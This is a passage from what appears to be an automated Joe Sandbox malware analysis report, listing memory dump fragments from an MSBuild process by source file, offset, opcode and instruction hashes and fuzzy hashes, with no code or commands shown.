                                                                                                                              • Instruction Fuzzy Hash: 06517F74E01208CFCB09DFA9D59499DBBF2FF89310B209469E809AB365DB35AD42CF54
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 683c1b8322a61e5ffff5e2ae444f1111db853b722f9d162b66300dee17a6fe95
                                                                                                                              • Instruction ID: 843b773da144f709fe62d02fa93a67017c0437a00d1797e731f077e886bb9103
                                                                                                                              • Opcode Fuzzy Hash: 683c1b8322a61e5ffff5e2ae444f1111db853b722f9d162b66300dee17a6fe95
                                                                                                                              • Instruction Fuzzy Hash: EF419D31A44249DFCF12CFA8C848BDEBBB2AF49314F04D465E915AB391E370E954CB50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8630609ff9c424bd04782dfccd2fd686690259d891e383aa0ed871d1e2bb68d1
                                                                                                                              • Instruction ID: a414ffcfb5c0a3bf6f9ba81ee4d0c82eeada203cb86f304b322242cdedc44369
                                                                                                                              • Opcode Fuzzy Hash: 8630609ff9c424bd04782dfccd2fd686690259d891e383aa0ed871d1e2bb68d1
                                                                                                                              • Instruction Fuzzy Hash: 30316E317842658BDF1A467998953FFABA6AFC5208F18D4BEE802C3380DB75CC45C760
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 943ec125e25cb55a487252261ace3e4d3b394ed529ab16c5f2557e48661c23d8
                                                                                                                              • Instruction ID: 00e7152aed758cac4942d07ef96e7096276740c46e7a72266bd7399c2b945baf
                                                                                                                              • Opcode Fuzzy Hash: 943ec125e25cb55a487252261ace3e4d3b394ed529ab16c5f2557e48661c23d8
                                                                                                                              • Instruction Fuzzy Hash: 7F41DE74E422088FDB14DFA5D9847EEBBF2FF89300F249529E805A7294DB385A46CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4b7bf48fd3dd12ba5ea69cd6a677f3beddee841b403d17e202c6d9c61223f85b
                                                                                                                              • Instruction ID: a021454c8cb293d3a96a4548fc9b86596c917a6f017d7246822b599337c6f4b2
                                                                                                                              • Opcode Fuzzy Hash: 4b7bf48fd3dd12ba5ea69cd6a677f3beddee841b403d17e202c6d9c61223f85b
                                                                                                                              • Instruction Fuzzy Hash: 1041DE32A402489FCB128F64C844BABBBF6EF84304F04D46AE815DB691DB79DD55CBA1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7050285b617426aa7dd894acdd9442bf25ebe8d18b458aee2dafcedddcce3177
                                                                                                                              • Instruction ID: d525abebba6ad1870b27cb8b8eaf4f13109fbf54343b861ab1d7ccb147d5b5b0
                                                                                                                              • Opcode Fuzzy Hash: 7050285b617426aa7dd894acdd9442bf25ebe8d18b458aee2dafcedddcce3177
                                                                                                                              • Instruction Fuzzy Hash: D3319F31781109DFCF129F65E854AAF3BB2EF48304F909869F91597244DB39CD62CB90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d43d8827c5597b48627e65620286446109f17c104e384e3a6fadd02bf6d9c1f5
                                                                                                                              • Instruction ID: b2accee183f702222c3cf4af48fc57ba22399521f30abb3ed16fc36bb71e0d44
                                                                                                                              • Opcode Fuzzy Hash: d43d8827c5597b48627e65620286446109f17c104e384e3a6fadd02bf6d9c1f5
                                                                                                                              • Instruction Fuzzy Hash: 7E31B4303811098FCB26CB6AD8587BF776FBF84704B14A86AE052CB392DB28CC81C755
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d015f6138617b5739f8005deff7cbfd74082572b274960b2cc8f88c94ddbe771
                                                                                                                              • Instruction ID: f5d9d06406d1e52718f42f9a14acdb62e7668d5d9c755c4bff9ae0991bf2029f
                                                                                                                              • Opcode Fuzzy Hash: d015f6138617b5739f8005deff7cbfd74082572b274960b2cc8f88c94ddbe771
                                                                                                                              • Instruction Fuzzy Hash: 7421B0303842018BEB169A2694547BF329BAFC474CF54E43AD602CB7A9EF65CC82D381
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3576490546.0000000002E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E2D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2e2d000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: dc84f1b8bf6a0e63648636eef8338e42dbf47a243ba7068f03233f708a696ad8
                                                                                                                              • Instruction ID: bb094cf24717937eeec57d1929de71210a0c44f1a36dc2029c4f487e7bbe3f59
                                                                                                                              • Opcode Fuzzy Hash: dc84f1b8bf6a0e63648636eef8338e42dbf47a243ba7068f03233f708a696ad8
                                                                                                                              • Instruction Fuzzy Hash: 8331297114E3C49FC7038B24C9A0711BF71AB47214F29C5DBD9898F2A7C22A980ACB62
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 295dbf431b1a8c8dc86de324e44bb482da37d8598cd1c9fa4064e72383d88a3a
                                                                                                                              • Instruction ID: 8d1af62380468cf5be525c4e5576e2bf0cc0018b293215034e84ea31d964c183
                                                                                                                              • Opcode Fuzzy Hash: 295dbf431b1a8c8dc86de324e44bb482da37d8598cd1c9fa4064e72383d88a3a
                                                                                                                              • Instruction Fuzzy Hash: 7F2100317856118FC7269A2AD45496FB3A6EFC9759709947AE816CB394CF30CC02CB80
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 164663a47f56ed6ba5867e5f6b470a0ff1c038d12f2f518360dfc44f0d5fd912
                                                                                                                              • Instruction ID: d848f4229d733b44b2c01c8a2eaa5665634e1f6dd9d04e1490a4041ef36da270
                                                                                                                              • Opcode Fuzzy Hash: 164663a47f56ed6ba5867e5f6b470a0ff1c038d12f2f518360dfc44f0d5fd912
                                                                                                                              • Instruction Fuzzy Hash: 8E21AC31A0110A9FCF15CF24C440AEF77A5EF9D264B10C16DEA1AAB350EB34EA42CBD1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3576396837.0000000002E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E1D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2e1d000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2392429d4cc3f1e1cf699bcdeb38e9b20211242321484144c4edb1c3709ca03e
                                                                                                                              • Instruction ID: 8d86ed68a60610e8892cbc2419b521c5d912dd4cbe03de71e28f24e57ac8ebc0
                                                                                                                              • Opcode Fuzzy Hash: 2392429d4cc3f1e1cf699bcdeb38e9b20211242321484144c4edb1c3709ca03e
                                                                                                                              • Instruction Fuzzy Hash: F0210372540204EFDB05DF14D9C0B56BB65FB88318F24C57DE90A0A256C33AD456CAA2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3576490546.0000000002E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E2D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2e2d000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 733160e38c5e33ba7cd2b5310d1f5450844cd31a0c41f7061df72fd4179db569
                                                                                                                              • Instruction ID: ead0ee5a81b51b11f627e0db0abe4205ac53673c1a6572e195be96c6dbf543a7
                                                                                                                              • Opcode Fuzzy Hash: 733160e38c5e33ba7cd2b5310d1f5450844cd31a0c41f7061df72fd4179db569
                                                                                                                              • Instruction Fuzzy Hash: 13D0673AB41008DFCB049F99E8409DDF7B6FB98221B448516F925E3260C6319965DB60
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b6f8a5eb9b3bfaca2d899a26d41c7b45e0c96376292764b75cfebb158d36740d
                                                                                                                              • Instruction ID: 12f5121d1cd7861d468c9e905dcd84f4c4dd3e27f017e18e8830226e4a27070a
                                                                                                                              • Opcode Fuzzy Hash: b6f8a5eb9b3bfaca2d899a26d41c7b45e0c96376292764b75cfebb158d36740d
                                                                                                                              • Instruction Fuzzy Hash: 97C0123054430A8EDA41FBA5FD445157B2AE680304B419938A1051A749EE7D5C864A90